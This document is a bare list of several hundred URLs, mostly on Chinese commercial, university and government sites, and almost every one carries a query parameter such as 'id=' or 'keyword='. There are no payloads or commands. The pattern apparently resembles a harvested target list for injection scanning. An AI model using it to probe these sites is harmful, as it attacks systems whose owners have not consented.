http://www.13173.net.cn/common.asp?id=1 http://www.13365336060.com/info.asp?id=3 http://www.13826005855.com/products.asp?smallid=1 http://www.13949955982.com/about.asp?id=5 http://www.13rs.com/news.aspx?id=392 http://www.151400.com/do/friendlink.php?job=apply http://www.1515u.com/bbs/Capturing/ShowTopic.asp?TopicID=48 http://www.158miaomu.com/wkp2/info_article.asp?id=284 http://www.15crmog.com.cn/cpshow.asp?id=48 http://www.167.gov.cn/167jtcontent.aspx?ArticleID=781 http://www.16858888.com/news.asp?id=1 http://www.168caizi.com/cp.asp?classid=1 http://www.16guilin.com/car/show.asp?id=13 http://www.16mn-wfgg.com/small_address.asp?id=319 http://www.172586.com/forum.php?gid=1 http://www.17itravel.com/tripDetails.aspx?id=357 http://www.17qgjx.com/forum.php?mobile=yes http://www.17shiliao.com/plus/search.php?keyword=%CD%F8 http://www.17sys.com/fwxxlist.asp?fid=3 
http://www.17-u.com.cn/line_view.asp?productno=712 http://www.181398.com/plus/search.php?keyword=ui http://www.1819.tv/jscd.asp?xl=111 http://www.18867758666.com/news_look.asp?id=185 http://www.188km.com/content.php?id=4230 http://www.18kmw.com/sd_about.asp?id=1 http://www.18wjj.com/conx.asp?id=277 http://www.19216811.com.cn/plus/search.php?keyword=%D0%DE%B8%C4%C2%B7%D3%C9%C6%F7%C3%DC%C2%EB http://www.1949golf.com/plus/search.php?keyword=as http://www.1980xd.com/Modern/newsList.aspx?type=12 http://www.1998wsgj.com/en/news_display.php?id=14 http://www.1fml.com/Case.asp?BigClassID=2 http://www.1inj.cn/search.php?mod=forum&srchtxt=%BB%EE%B6%AF&formhash=fabc32cb&searchsubmit=true&source=hotsearch http://www.2008you.com/about.asp?aid=32 http://www.2014jordan.net/index.php?main_page=shopping_cart&zenid=9c1odgc87sl5viiejr6aejem37 http://www.2014shijiebei.net/forum.php?mobile=yes http://www.20ggangguan.net/xianhuoshow.asp?id=55 http://www.21257.com/List.asp?cid=1 http://www.2198.com/site/Proseckill.aspx?kid=49 http://www.21artedu.com/news.asp?nid=7 http://www.21marina.com/home.asp?page=2 http://www.21njky.com/product.asp?id=166 http://www.220183.com/alist.asp?id=17 http://www.2212888.com/news_show.asp?id=318 http://www.23w.net/Caselist.asp?Yid=36 http://www.24jq.com/forum.php?gid=58 http://www.288job.com/Resume.asp?PID=66128 http://www.28buv.com/item_dm.asp?id=16 http://www.28web.cn/case.asp?id=28 http://www.299120.com/wkview.aspx?newsid=27 http://www.2hong.com/plus/search.php?kwtype=0&searchtype=title&q=%D0%A1%C8%FD http://www.2jiewu.com/forum.php?mod=rss&auth=0 http://www.300shop.net/index.php?main_page=shopping_cart&zenid=03dae8a245e635a266410149be958e99 http://www.301718.cn/product/viewpic.asp?id=5229 http://www.3040762.com/catalog.asp?tags=%E7%A1%AC%E7%9B%98 http://www.310316309.com/product/product.php?class1=90 http://www.310sgg.com/new_show.asp?id=107 http://www.zjgshm.com/nbgs/Product_info.asp?id=1203 http://www.0731pxw.com/html.asp?showid=1 
http://www.3m2131.com/base_info.asp?id=1 http://www.sxlyzy.edu.cn/newsxzy/majorview.asp?pid=164 http://www.ytjzy.com/info.asp?id=1 http://ccce.its.csu.edu.cn/xsgz/news.asp?sid=23 http://www.jzyy1949.com/znks.asp?ksid=5 http://www.sztyfhcl.com/newstitle.asp?id=36 http://mse.hust.edu.cn/about.php?catPath=0,50,59&catID=60 http://csun.upc.edu.cn/show.asp?listid=300 http://www.gxtcmu.edu.cn/show.aspx?id=13229 http://law.bjtu.edu.cn/detail.asp?mtype=1&num=1&id=129 http://glxy.cuit.edu.cn/other/Treadnews.asp?TNewsId=415 http://rsc.nchu.edu.cn/bigclass.asp?id=3 http://www.oldqlshx.sdnu.edu.cn/news_more.asp?lm2=2 http://www.noblesseobligeventi.com/portfolio.asp?categoria=Eventi http://www.security.buct.edu.cn/category.asp?typeid=1 http://jhzmba.com/book.asp?pid=516 http://estudy.hubu.edu.cn/downcontent.aspx?id=217 http://www.ziboguntong.com/about.asp?id=1 http://www.cnxjc.cn/news.asp?nlt=8 http://www.myiq365.com/IQImage/ImageInfo.aspx?type=4&gid=ddd9c3e4-65b6-4da2-8916-3a025cdadf5b http://www.jianzhi5.net/plus/search.php?q=%E4%BC%98%E5%8D%9A%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0 http://www.syyd.net/djlist.asp?id=458 http://www.sanmeijingshui.com/Cn/intro.asp?id=1 http://www.maigewall.com/info.asp?id=1 http://www.fcl.org.cn/Intro.asp?Snt=8&id=57 http://www.bcxsq.com/product.php?type_id=7 http://www.lm9999.cn/info.asp?id=10 http://www.tjruiyuan.com/column.asp?baseid=2&tid=2001 http://www.phy.nenu.edu.cn/list2.php?id=45 http://tw.lixin.edu.cn/default.php?mod=article&fid=1 http://www.sdau.edu.cn/yjs/v2.0/lanmu.php?lid=27 http://www.qrnu.edu.cn/800readnews.asp?id=13439 http://ldgh.lzu.edu.cn/list.asp?id=570 http://dqxy.lzjtu.edu.cn/articles.php?artid=2421 http://cwc.ncu.edu.cn/show.asp?id=245 http://www.glit.edu.cn/glitwy.asp?id=362 http://www.jjhqbf.com/about.asp?sid=6 http://www.xzfhcy.cn/news_detail.asp?ids=25 http://hzzqjx.com/newsdetail.aspx?id=1785&class_id=1&tq=34 http://www.hnpi.net/tp2006/pl_view.asp?lb=11 http://www.sdchenyu.com/article_show.asp?id=197 
http://www.xh.org.cn/newsshow.asp?id=76 http://www.dfzpw.net/newsinfo.php?id=1675 http://www.haisong.biz/plus/singlepage.php?sid=18 http://www.ebohua.com/Company.asp?id=43 http://www.ebud.net/ebudfilm/filmintro.asp?fm01ide=556 http://www.ec2hk.com/plus/search.php?q=%E4%B8%9C%E6%96%B9%E5%A4%AA%E9%98%B3%E5%9F%8E http://www.ec517.com/Diary.aspx?type=58 http://www.eccsp.org/sitecn/aspx/bzzx.aspx?tid=1648 http://www.ecegp.com/english/news/shownews.asp?ID=738 http://www.ecerb.gov.cn/aqscy_m.jsp?typeid=1519 http://www.e-chance.com.cn/about.asp?id=7 http://www.echushi.org/help.asp?sort_id=7 http://www.ecojoy.cn/nes_show.asp?B_ID=548&P_Class=5 http://www.ecpump.com/about.asp?Id=9 http://www.ecsh-dl.com/about.php?tid=333 http://www.edsoyo.com/article.php?cid=1 http://www.edu-gzstats.gov.cn/show/showarticle.asp?ID=770 http://www.eduie.org/plus/search.php?keyword=A&searchtype=initial&typeid=2 http://www.edulife.com.cn/wangluo/huadongligong/zhuanye.aspx?id=1597 http://www.edutrain.cn/NewsCover.aspx?Id=3 http://www.eeway.cn/plus/search.php?search_page=1&keyword=1%E5%85%8B%E6%8B%89%E9%92%BB%E6%88%92 http://www.e-fanyi.net/main/MainSub.asp?Id=1731 http://www.ejatec.com/kind1.asp?id=267 http://www.ekangcn.com/TXL/web/news/newsNote.php?id=100 http://www.elaian.cn/plugin.php?id=zzzai_lastthread&view=t&page=1 http://www.elejie.com/forum.php?mod=viewthread&tid=18293 http://www.elephant-china.com/news_list.asp?type1_id=70 http://www.eletrans.com.cn/about.php?Id=280 http://www.elizabeth-w.com/category.asp?nclassid=585 http://www.emar.com.cn/news.php?id=9 http://www.emingzx.com/ldw3/Product_info.asp?id=1695 http://www.emjiasheng.com/product_detail.asp?id=145 http://www.emjob.com/ArticleList.aspx?newTypeId=8 http://www.emmacreation.net/pro.asp?ClassID=13 http://www.emonit.cn/rss.php?auth=0 http://www.emseos.com/forum.php?mod=rss&auth=0 http://www.e-nai.cn/index.php/NewTrends/index?id=205 http://www.encolor.com/ArticleShow.asp?ArticleID=377 http://www.energyleague.com/index.php?a=imp 
http://www.enging.com.cn/waijiaofengcaineirong.aspx?id=7 http://www.enov.cn/news_1.asp?cla1=7&cla2=35 http://www.enricgroup.com/productslist.asp?sortid=125 http://www.enterethiopia.com/about.php?abid=1 http://www.eoeandroid.com/member.php?mod=logging&action=login&referer= http://www.ep2001.com/design_details.aspx?id=92 http://www.epa1973.com/news/newsinfo.asp?newsid=12006 http://www.ept.com.cn/pro_visa/class_visa.asp?Page=2&Var_pageCount=30&Version=v2.0 http://www.epxbh.com/epxb/Product_info.asp?id=990 http://www.eqrlj.com/New_list.asp?FormKey=t_ZWXX_Class&SenFormKey=t_ZWXX&SenName=%E5%85%AC%E5%91%8A%E5%85%AC%E7%A4%BA&OneName=%E6%94%BF%E5%8A%A1%E4%BF%A1%E6%81%AF&SenFormKeyId=72 http://www.erci-china.cn/news_help_show.asp?brand_typeid=10 http://www.erdostjgzc.com/page.asp?id=612 http://www.ergdq.com/product_show.asp?id=70 http://www.erpw.net/read.asp?id=1 http://www.erquan.com.cn/display.asp?id=48 http://www.erzilongxia.cn/article.asp?id=5 http://www.esjsp.com.cn/ssti/Product_info.asp?id=750 http://www.esjzd.com/about.asp?c=1 http://www.esurong.com/lczq.jsp?type=3&ntype=2 http://www.eswtj.com/newsinfo.asp?id=1296 http://www.etelecom.cn/shortshow.asp?id=347 http://www.etidea.cn/news.asp?id=3 http://sce.ncu.edu.cn/info.asp?id=801 http://www.yjsb.com.cn/article.asp?id=774 http://www.pausal.org.cn/cgtj/cgtj.asp?leibieid=4 http://www.shyhr.cn/info.asp?id=1 http://www.tzcjdz.com/InfoProductView.asp?id=2633 http://www.czlkfm.com/productd.asp?lid=14 http://student.uoh.edu.cn/list.asp?sort_id=657 http://ky.ndnu.edu.cn/Lectureinfo.asp?id=2 http://jwc.just.edu.cn/shownew.aspx?id=1344 http://xyy.nwsuaf.edu.cn/c_news.php?sortid=2 http://zjc.jju.edu.cn/new/detail.asp?n_id=50030 http://road.hncc.edu.cn/About/About.asp?ID=8 http://xsc.syau.edu.cn/cwf/info.asp?MenuID=14 http://www.haoshunguanjian.com/city_index.aspx?city=liaoning http://zlgc.jmu.edu.cn/show.asp?fid=1 http://jdx.jsit.edu.cn/look_page_big.asp?yiid=57 http://www.cdxymm.com/cdxy/Product_info.asp?id=1084 
http://www.wfganzaoji.com/info.asp?id=1 http://www.roofonline.cn/news.php?sort=169 http://www.xutairubber.com/employ_more.asp?unid=221 http://fazhanzx.sqnc.edu.cn/newshow.asp?id=328 http://www.szsjjwx.com/News_detail.asp?id=194 http://bwc.hntbc.edu.cn/info.asp?s=9 http://www.yjjob.com.cn/zczx/sort.php?ID=1 http://hqjt.zjnu.edu.cn/hq_communist_work/article_content/article_content_Default.asp?id=3520 http://www.yohen.net/company.asp?id=2 http://www.ean98.com/car.php?t=esm&n=10173 http://www.zgqzsy.com/about.asp?id=1 http://www.gcclqxj.com/info.asp?id=1 http://www.hyyhht.com/Product.asp?BigClassID=39 http://std.nuc.edu.cn/List.aspx?kind=44 http://cjc.sysu.edu.cn/further.asp?Id=73 http://www.hebeipiano.com/city_index.aspx?city=hebei http://cree.sdust.edu.cn/jxw_news.asp?ppclassid=197 http://yxsfzx.njmu.edu.cn/about.asp?cid=%D6%D0%D0%C4%BC%F2%BD%E9 http://www.sdwsjs.com/info.asp?id=1 http://www.yztgg.com/plus/advancedsearch.php?mid=7&typeid=15 http://www.huaqianghj.com/showproduct.asp?id=157 http://www.cqhdbf.com/contact_view.asp?keyno=3 http://www.zgtjh.com/ypnew_list.asp?id=46 http://jgxy.cug.edu.cn/xgz2007/News_Class.asp?ClassID=49&RootID=1 http://zdh.qust.edu.cn/list.asp?ClassId=39 http://english.cumtb.edu.cn/info.php?id=81 http://www.newjiaju.com/help.php?aid=13 http://www.zsyyt.com/tzgg.php?id=20 http://www.sinojqksb.com/city_index.aspx?city=jiangsu http://www.wm5201314.com/newsbrow.asp?cid=733 http://www.wmsub.com/rss.php?auth=0 http://www.wnhb.gov.cn/show.aspx?id=10596 http://www.wnk.cn/showgg.asp?id=144 http://www.wnsyj.com/products.asp?nclassid=146 http://www.wonston.cn/product_show.asp?id=158 http://www.wooddoorqd.cn/about.asp?id=1 http://www.woojong.com.cn/certificate_.asp?classid=3 http://www.woolmarket.com.cn/NewsList.aspx?id=25 http://www.woooo.cn/views.asp?id=781 http://www.worldexh.com/BizList.asp?ClassID=97 http://www.world-stone.com/product_show/lista.aspx?nid=%e8%98%91%e8%8f%87%e7%9f%b3&bid= http://www.woyaozhan.com/index.php/Product/index?type1=1 
http://www.wozhuce.com/showx1.asp?Tid=202 http://www.wqdrygl.com/cp_show.asp?id=41 http://www.wqhouse.com.cn/qgxq.asp?id=5052 http://www.wqit.net/page.php?cid=21 http://www.wr0566.com/forum.php?mobile=yes http://www.wsciot.com/news.php?module=news&classpid=2 http://www.wscjwx.com/plus/search.php?q=3344111.com http://www.wscljs.com/info.asp?id=1 http://www.wseduncc.com/About_Win.asp?id=1 http://www.wsgcindiaweek.com/newsshow.asp?id=841 http://www.wshtm.com/plus/search.php?q=%E5%85%A8%E8%AE%AF%E6%96%B02 http://www.wsnews.com.cn/Default_mbjx.aspx?templateid=75&Class_ParentID=166 http://www.wspfw.cc168.cc/news_info.asp?cid=0&tid=333&dataid=962 http://www.wsxw.gov.cn/bbs/forum.php?mod=forumdisplay&fid=2 http://www.wsxx120.com/show.asp?Cid=281&ID=134 http://www.wubilx.cn/plus/search.php?keyword=%CE%E5%B1%CA%B4%F2%D7%D6%C1%B7%CF%B0 http://www.wugangdaopian.cc/newsshow.asp?id=685 http://www.wugongshan.org/news.asp?xid=22 http://www.wuhanmsa.gov.cn/message.aspx?id=0 http://www.wuhujt.com/article.php?id=24 http://www.wuhy.net/hmhs/Product_info.asp?id=2344 http://www.wujiuwenxue.com/modules/article/index.php?fullflag=1 http://www.wulanchabu.gov.cn/wlcbsearch.jsp?title_content=all&keyword= http://www.wulingshan.com.cn/news.asp?id=1 http://www.wuliu123.cn/gg/gg.aspx?id=1 http://www.wust.com.cn/forum.php?mod=rss&auth=0 http://www.wutaimb.com/ProductList.aspx?BigClassId=144&SmallClassId=165 http://www.wuweijob.com/News_More.asp?NewsTypeId=42 http://www.wuxijinli.com/english/news.asp?nlt=13 http://www.wuxiky.com/news_content.aspx?newid=260 http://www.wuxingwxw.com/xiangmu.asp?typeid=121 http://www.wuxisj.com/news.asp?nlt=24 http://www.wuxitengye.com/products_s.asp?id=1068 http://www.wuxiyibiao.com/productshow.asp?lt=1386 http://www.wuyiwj.com/news_view.asp?id=99 http://www.wuzhong.zp300.cn/zczx/sort.php?ID=1 http://www.wuzhoucn.net/jt/newshow.asp?id=2995 http://www.w-valve.com/products.asp?bid=1839 http://www.wwdjdq.net/chanpin.asp?id=1035 http://www.www.51hwz.net/rss.php?auth=0 
http://www.wx12cr1movg.com/12cr1movghejingangguan-1.asp?id=886 http://www.wxaefi.org/shownews.asp?lt=542 http://www.wxbaijia.com/gcbz.asp?id=14 http://www.wxbaoli.com/product.asp?id=7 http://www.wxbjw.cn/shownews.asp?lt=699 http://www.wxbxghg.com/zixun.asp?id=27 http://www.wxchina.net/news.asp?classid=58 http://www.lan-wisdom.cn/newsdetail.php?id=18 http://sbc.fjmu.edu.cn/newsByType.asp?typeid=2 http://www.xhyuanyang.com/product.asp?id=1 http://kjxy.hrbcu.edu.cn/WebXygk.aspx?from=top&Cid=1 http://rjxy.hnzj.edu.cn/showNews.asp?type=0&id=69 http://zsjy.cqjtu.edu.cn/jyw/ShowResume.aspx?StuID=10940104 http://job.bnuz.edu.cn/com_job_list.asp?id=1748&com_id=1654 http://xyh.cdu.edu.cn/schnewslist.php?id=2 http://pxb.nenu.edu.cn/class_list.php?fid=5 http://pinggu.hnfnu.edu.cn/list.php?id=2 http://icec.sisu.edu.cn/kyjg.asp?id=12 http://www.oocat.net/about.asp?id=1 http://sjc.njfu.edu.cn/info.php?id=64 http://rc.usst.edu.cn/list.php?newsid=11 http://sjc.cumt.edu.cn/lanmu.aspx?lanmuid=%e6%96%b0%e9%97%bb%e5%8a%a8%e6%80%81 http://www.gxic.net/vote.asp?id=1 http://www.wzjmsfs.com/prodisp.asp?cpid=403 http://cme.hrbmu.edu.cn/ggxx.aspx?ggid=109 http://www.xbzx.ynu.edu.cn/DownLoad/Show.aspx?id=64 http://eel.xmu.edu.cn/news_browser.php?id=1385112560 http://www.timedate.cn/mytime.asp?n1=1&n2=394&n3=448&n4=539&n5=201&n6=213&n7=150&n8=128&n9=47&n10=329 http://www.yx67.com/NewsMore.asp?id=12 http://snjxdyxs.com/English/news_show.asp?code=wz0000000000021 http://www.yanyi100.com/teacher_show.asp?id=28491 http://www.wxqzzz.com/product.asp?Pone=1 http://wykyw.hebut.edu.cn/active.php?cat=1 http://www.chinasjw.net/news_detail.asp?NewsId=121 http://spa.njnu.edu.cn/show.asp?id=3000 http://www.jnyxlb.com/newsn.asp?id=280 http://departs.glut.edu.cn/jgdw/class.asp?id=24 http://cxzy.huat.edu.cn/NewsList.aspx?num=1 http://zyz.qau.edu.cn/Newsview.asp?id=251 http://djsz.lumei.edu.cn/images.asp?titleID=35 http://mba.njfu.edu.cn/news.asp?classid=146 
http://zbb.shu.edu.cn/graduateweb/news/viewnews.asp?id=9171&type=10 http://cie.upc.edu.cn/cie/news2.aspx?id=%E6%A6%82%E5%86%B5 http://www.cnmjshw.com/newsshow.asp?id=774 http://www.nx1001.com/misc.php?mod=faq&action=faq&id=4 http://www.xxddjzm.com/abouts.php?id=9 http://www.szgjp.com/cp.asp?Product_ID=1334 http://www.ahjdf.cn/newshow1.asp?id=95 http://www.ssc83.com/plug/tags.asp?tag=%E5%85%AD%E5%90%88%E5%BD%A9%E7%9B%B4%E6%92%AD http://www.ynzhsj.com/city_index.aspx?city=kunming http://www.mvtom.com/about.asp?tmpId=25 http://www.imautokey.com/shownews.asp?id=64 http://www.cdhaierweixiu.com/new.asp?id=900 http://www.bcm-art.com.cn/shop/productshow.asp?plt=1498 http://www.bdhnjlg.com.cn/lvguan1.asp?id=239 http://www.bdhzyh.com/show.asp?id=1477 http://www.bdjtc.com/info.php?class=64 http://www.bdlvdi.cn/bdld/product_info.asp?id=299 http://www.bdsanding.com/info.php?pid=9 http://www.bdsczj.net/pics_list.php?class=59 http://www.bdshw.com/class.asp?id=399 http://www.bdsj.cn/plus/search.php?keyword=%E9%98%B3%20%E7%97%BF http://www.bdsjsj.com/news_view.asp?id=175 http://www.bdweichang.com/plus/search.php?q=%CE%B8%C8%C8%BF%DA%B3%F4&w=+ http://www.bdxzfw.cn/bdsdzjcxt/portal/dzjc/qzpy/default.aspx?OrgID=100 http://www.bdzf.org/news.asp?ClsID=16 http://www.bdzhjx.com/LinkfriendLinks.asp?lmid=24 http://www.bdzhongyou.com/display_new.asp?id=218 http://www.beauty.com/list.asp?catid=10782&trx=newgn_10782 http://www.bechina.org/case_detail.asp?ParentID=65&News_ID=2457 http://www.beihaily.com/about.php?id=1 http://www.beihaimj.com/activityView.asp?id=66 http://www.beihu.gov.cn/qy/guest_show.asp?id=22 http://www.beijingguohuayuan.com/hyld_show.asp?id=222 http://www.beijingqiang.net/download.asp?dl=20 http://www.beishanjiaxiao.com/newsinfo.asp?id=430 http://www.beishanws.com/forum.php?mobile=yes http://www.beitaiele.com/product_show.asp?id=833 http://www.beitang.zp300.cn/zczx/sort.php?ID=1 http://www.beiweihy.com.cn/cases2copy.asp?industry=1 http://www.bekesen.cn/htm/about.asp?id=16 
http://www.bendi-bao.cn/news.asp?keyno=11105 http://www.benychina.com/about.asp?classid=21 http://www.best9000.com/rss.php?auth=0 http://www.bestirtools.com/pview.asp?id=2458 http://www.betterracks.com/product.asp?classid=2 http://www.bfamcmc.edu.cn/about/index.asp?id=17 http://www.bfjkw.org/jynew.asp?id=1490 http://www.bgmic.com/about.asp?id=2 http://www.bha.com.cn/Newsshow.asp?id=15 http://www.bhbikes.cc/news/show.asp?id=212 http://www.bhql888.com/art.php?id=60 http://www.bhtbnt.com/cityph_d.asp?product_class=5 http://www.bhtour.cn/car/show.asp?id=20 http://www.bhzb.gov.cn/q_flfw.asp?lm_id=1023 http://www.biaoyu.cc/gonggao_do.asp?id=1649 http://www.bidblog.cn/plus/search.php?keyword=%CD%F8%C2%E7 http://www.bijsc.com/article.asp?class=1 http://www.bilantian.cn/plus/search.php?keyword=%E6%96%B0%E9%97%BB%E8%90%A5%E9%94%80 http://www.bingjiaday.com/b1.asp?id=952 http://www.bingxi.net/rss.php?auth=0 http://www.binhai.zp300.cn/zczx/sort.php?ID=1 http://www.binlitex.com/product_06.asp?id=525 http://www.binzhoushaiwang.net/series.asp?id=72 http://www.bio-foto.com/index.php?lang=czech http://www.biohitchina.com/about.asp?id=12 http://www.bitcongress.com/allconferencesarea.asp?m=0 http://www.bitfr.com/display_new.asp?id=79 http://www.bitmap3d.com.cn/ShowComPro.php?ComProCatID=1 http://www.bitpress.com.cn/index.php?id=6 http://www.biyingfood.com/Newsshow.asp?id=14 http://www.biz-beijing.org/buchmesse.php?id=20 http://www.bj9966.cn/showhelp.asp?id=227 http://www.bjbaoguan.com/news_show.asp?id=321 http://www.bj-baozhuang.com/detail.php?id=12 http://www.bjcarbon.com.cn/news_ny.asp?artid=174 http://www.bjcmjj.com/Product.aspx?kid=1 http://www.bjctc.com.cn/show.asp?id=354 http://klas.cuit.edu.cn/newsrd.asp?newsid=20140627182259&newsno=399 http://lib.gipe.edu.cn/showlan.aspx?sjid=0&id=2 http://www.hnkangtu.net/about.asp?bigid=1&smallid=58 http://keji.qau.edu.cn/news1/kjnew1.php?id=818 http://www.wxgg10.com/news1.asp?id=2058 http://zsjy.ustl.edu.cn/xxgk.asp?id=264 
http://jwc.zqu.edu.cn/Navigation.aspx?FN=1 http://www.m1628.com/case.asp?sid=57&bid=1 http://www.zgxysy.com/rss.php?auth=0 http://jxx.dgut.edu.cn/down.asp?id=67 http://www.njgsmach.com/cn/aboutus.asp?id=1 http://cls.cjlu.edu.cn/c/type.asp?typeID=14 http://wyx.zjc.edu.cn/xwzx/news_more.asp?lm=195 http://foundation.bjtu.edu.cn/newslist.aspx?id=7 http://www.ybzy.edu.cn/xqhz_xnsxgc_xx.aspx?uId=938 http://sbc.usts.edu.cn/ShiYanShi.aspx?NewsType=-301&TypeNo=-203 http://www.yadiantaoci.com/Products.aspx?id=3 http://yjsy.fzu.edu.cn/dd_list.asp?newid=19580&classid=928 http://www.sdbnyz.com/news.asp?lei=45 http://www.shjfy.com.cn/office_msg_detail.php?id=1 http://www.wfmcjq.com/info.asp?id=3 http://www.bag0086.com/chineve_manager/message.asp?id=121 http://jgxyh.heuet.edu.cn/news.asp?class=xyxw http://tgsf.ynnu.edu.cn/otherCont.aspx?name=%E8%AF%BE%E7%A8%8B%E8%B5%84%E6%BA%90 http://zhaosheng.yzu.edu.cn/sort.asp?dy1=%B9%AB%B8%E6%C0%B8 http://fdc.ruc.edu.cn/displaynews_video.php?id=294 http://www.shanghaitoyexpo.com.cn/en/news_open.asp?id=171 http://grs.zmc.edu.cn/show.asp?id=715 http://www.wx-huawei.cn/product.asp?Pone=17 http://www.miaomuqk.com/ArticleClass_Show.asp?Class_ID=237 http://www.wjyt-china.org/jsp/toy/usershop/companyindex.jsp?shopname=beleduc http://www.rafeiyang.com/pro_list.asp?type_id=32 http://nic.xjtu.edu.cn/nclass.asp?id=20&c=1 http://rwjd.zjgsu.edu.cn/content/detail.php?sid=23&cid=514&id=1006 http://ctd.ruc.edu.cn/newslist.php?type=2 http://yb.nenu.edu.cn/cjwd2.php?aid=4872 http://www.zxin.net.cn/DemandList.aspx?demandType=2 http://218.87.136.5/haohao_list.php?haohao=news&id=4258 http://www.ut168.com.cn/article.asp?ID=566&sortid=112 http://www.gjssxy.com/cinfo.asp?id=139 http://www.tadhzj.com/news_show.asp?xx_nrfb_content_id=193 http://www.zdnyjd.com/newshow.asp?id=638 http://www.mitr.cn/gg_view.asp?id=126 http://www.mixini.cn/hj/ProductShow.asp?ID=1088 http://www.miyoukeji.net/view/search.php?keyword=%E7%9D%BE%E4%B8%B8%E7%82%8E 
http://www.mizuno.com.cn/run.aspx?SportTypeID=1 http://www.mjajzz.com/readnews.asp?newsid=1624 http://www.mjnx.org.cn/list_news.asp?id=715&sort_id=656 http://www.mkgchina.com/front/product/index.php?cata=10 http://www.mkyd.net/news/newsviewa.asp?id=769 http://www.mlctsrq.com/about.asp?id=1 http://www.mldw.gov.cn/chief/index.php?ty=182 http://www.mlfelt.com/cpzs.asp?lei=1 http://www.mlrlele.com/news_look.asp?id=186 http://www.mltrans.net/MeiLianNewsContent.aspx?nid=1198 http://www.mlzh.gov.cn/news_detail.php?cid=1&id=664 http://www.mm520mm.com/member/index_do.php?fmdo=user&dopost=regnew http://www.mmdd-china.com/Product.aspx?Classid=11 http://www.mmgy168.com/mmgy/info_article.asp?id=1490 http://www.mmjob.com.cn/zczx/sort.php?ID=1 http://www.mncyw.com/new_list.asp?id=8 http://www.mobanzhongxin.com/news_newlist1_2.asp?classid=45 http://www.mocaxishuceshiyi.com/news_detail.asp?id=83 http://www.modernde.com/magazine/Directory_Theory.aspx?MagazineID=168 http://www.modpa.org/magazineshow.asp?id=68 http://www.mogong-group.com/caseview.asp?x_pid=368 http://www.mohe-pc.com/eproduct.asp?Sele=1 http://www.moogame.com/forum.php?mod=rss&auth=0 http://www.mos.ru/authority/activity/municipal/index.php?id_14=29712 http://www.motionlaw.cn/team.asp?kxid=11 http://www.moyuantang.com/csjieshao.asp?id=2023 http://www.mq-wz.com/newsview.asp?id=721 http://www.mrhz.cn/shangpu/11963/zhaoshang_view.asp?id=24922 http://www.mrkj-led.com/pdlist.asp?id=104 http://www.msh.nnsme.com.cn/pic/user.asp?userid=52 http://www.msjhb.com/Products.aspx?BigID=1 http://www.mssccb.net/cp.asp?product_type=1 http://www.mssh001.com/sxds/Product_info.asp?id=2138 http://www.msyjchina.com/hdzs_1.asp?id=23 http://www.mtg.zp300.cn/zczx/sort.php?ID=1 http://www.mthhmmw.com/new_list.asp?id=28 http://www.mtuol.com/plus/search.php?keyword=%C3%C0%C5%AE http://www.murata-china.com/new/news_release/detail.php?ID=314 http://www.muwuz.com/articleshow_2.asp?articleID=1642 http://www.muye666.com/News.asp?id=49 
http://www.mwljx.com/chanpin.asp?anclassid=71 http://www.mxgled.com/intro/gb/about.asp?id=134 http://www.mxqidong.com/about.asp?id=3 http://www.mxtour.gov.cn/Text.Asp?SortId=65 http://www.my1766.com/news_nr.aspx?id=7401 http://www.myande.com/english/gc.php?bh=6&ej=16 http://www.mydry.cn/Association/isocview.asp?id=18 http://www.myfeg.com/cp.asp?ClassID=3 http://www.mygsdq.com/En/product_info.asp?productid=152 http://www.myiqi.cn/directory_x.asp?id=2787 http://www.myirbook.com.cn/AboutUs.asp?id=1 http://www.myitit.com/news/view.asp?id=3498 http://www.myjialian.com/product_forward.asp?lmid=87 http://www.myjj028.com/include/show.asp?Cid=267&id=1556 http://www.myjkw.com/Experts_show.asp?Doctor_id=158 http://www.myqxj.com/Ask.Asp?ID=9 http://www.myxingfa.com/ggjg.asp?id=52 http://www.myzc.cn/connect.php?mod=login&op=init&referer=index.php&statfrom=login_simple http://www.myzhendongshai.com/tuku.asp?cid=25 http://www.mzhxdec.com/about_us1.asp?id=3 http://www.mzhymj.com/NewShow.asp?byID=185 http://www.mzjdwx.cn/about.asp?id=3 http://www.mzkeji.net/show.php?contentid=269 http://www.mzly.gov.cn/news.asp?typeid=38 http://ibs.bfsu.edu.cn/news-ch.php?newsid=2847 http://yxtenglong.com.cn/readjswx.asp?id=20 http://www.gist.edu.cn/gbnews_view.aspx?id=20057&infotype=1 http://ie.sdmu.edu.cn/about.asp?id=1 http://www.sztqzs.com/news.asp?BigClassID=2&SmallClassID=5 http://www.xupei.com/alltime/detail.php?detail=zuodian http://www.2341367.com/t/y/glj.asp?id=1221 http://ias.ncu.edu.cn/admin_gaoyan/show.asp?id=313 http://ceec.tju.edu.cn/news_content.php?id=6 http://www.njdkl.com/Aboutus.asp?id=22 http://en.syau.edu.cn/about/p_show.asp?D_id=709 http://www.hbsi.edu.cn/newsmore.asp?typeid=42 http://jijinhui.lixin.edu.cn/default.php?mod=article&settype=0&fid=2 http://www.tjkeyuan.cn/ArticleShow.asp?ArticleID=538 http://tw.chd.edu.cn/MemberWeb/Qita/displayBBSDetail.aspx?ID=85 http://www.chinanimalhealthcare.com/chs/info.asp?id=172 http://jobs.shanghaitech.edu.cn/job.asp?id=69 
http://www.stu.sdu.edu.cn/content.php?num=7322 http://www.hnflc.cn/dongyunewslist.aspx?tname=%E5%AD%A6%E9%99%A2%E6%96%B0%E9%97%BB http://www.sdmmxh.com/sd/xh/ht.asp?id=2838 http://ae.jmu.edu.cn/listnews.asp?lm=379 http://www.chaozhu.cn/news_list.asp?id=180 http://www.cahe-as.edu.cn/xcgl/xchglfh.jsp?boardid=1401&bid2=140101&pageno=1?boardid=1401&bid2=140101&bid20=14010101&pageno=1 http://lsjyw.lnnu.edu.cn/detail.asp?id=6559 http://www.sh12351job.org/news_list.php?lm=83 http://sx.njtc.edu.cn/content1.asp?id=2582 http://yyx.slu.edu.cn/Soft/ShowSoft.asp?SoftID=18 http://www.londapc.com/computer_detail.asp?id=147 http://www.utsz.edu.cn/02platform/showNewsInfo.aspx?infoid=854 http://www.junmai123.com/contact.asp?id=51 http://xinquban.henau.edu.cn/onews.asp?id=770 http://www.fdc.zju.edu.cn/view_news.asp?newsid=689 http://cjc.sysu.edu.cn/educational.asp?Id=284 http://www.security.buct.edu.cn/category.asp?typeid=1 http://sbc.fjmu.edu.cn/news.asp?id=112&typeid=5 http://tyb.buaa.edu.cn/Course/teacher.php?id=3055 http://www.yhmsf.com/bbs/forum.php?mod=viewthread&tid=223234&extra=page%3D1 http://www.hztzgty.com/pic_info.asp?id=296 http://www.hzwomen.org.cn/wjt/wztcontent.jsp?id=1220 http://www.hzwzjs188.com/case_detail.asp?id=84 http://www.hzxingxing.com/about.asp?id=1 